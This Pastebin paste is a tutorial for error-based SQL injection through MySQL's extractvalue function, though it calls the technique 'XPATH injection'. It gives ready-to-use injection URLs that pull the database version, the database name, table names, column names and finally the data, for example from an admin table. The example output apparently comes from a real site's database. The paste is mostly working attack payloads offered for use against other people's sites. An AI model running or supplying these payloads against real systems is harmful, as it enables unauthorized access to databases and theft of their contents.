API tools faq
paste
Advertisement
Kyfx

XPATH Injection Using Extractvalue

Kyfx
Jul 25th, 2015
422
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.57 KB | None | 0 0
raw download clone embed print report
  1. let's Start Our XPATH Injection.
  2. Here is a Target Let's Find The Version with XPATH
  3. So here is our Query for Finding The Version in XPATH
  4.  
  5. XPATH QUERY: and extractvalue(0x3a,concat(0x3a,version()))
  6.  
  7. let's execute this Query in our Target Site.
  8. http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,version()))-- -
  9.  
  10. So this is The Version:XPATH syntax error: ':5.5.42-37.1-log'
  11. now Let's check The Current Database name There.
  12.  
  13. Here is the Query for finding the current Database name
  14.  
  15. XPATH QUERY: and extractvalue(0x3a,concat(0x3a,database()))
  16.  
  17. Execute this Query in our Target Site.
  18.  
  19. http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,database()))-- -
  20.  
  21. This is The Current Database name: XPATH syntax error: ':dealitea_dealiteasy'
  22. Now Let's move on to our Further injecting .
  23. Next is to finding The table names from the database.
  24. Here is The Query for Finding the Table Name.
  25.  
  26. XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database())))
  27. as we are injecting in XPATH so there we cant get all the tables .so we need to add LIMIT in our query to get The Tables One by One.
  28. So let's Add LIMIT in our Query.
  29. XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))
  30.  
  31. Now Execute this Query in Target Site For Finding The tables
  32.  
  33.  
  34. http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))-- -
  35. Increase the limit to get other tables in the current Database.
  36. Here we got the Table of Admin
  37.  
  38. Let's get the Columns from This Table: XPATH syntax error: ':deal_admin'
  39. Here is our query for Getting Columns from the table.
  40. XPATH QUERY:
  41. and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name=OUR_TABLE_NAME_HERE limit 0,1)))--
  42.  
  43. We Execute this query for Getting The Columns.
  44.  
  45. http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name=OUR_TABLE_NAME_HERE limit 0,1)))-- -
  46.  
  47. Increase the limit for other Columns in the Table.
  48. And The Final Part is to Extracting Data from The Columns.
  49. So Here is our Final Query.
  50. XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(COLUMN_NAME_HERE) from TABLE_NAME_HERE)))-- -
  51. Execute this Query in the Target Site for Extracting data of Columns From the Target Table.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!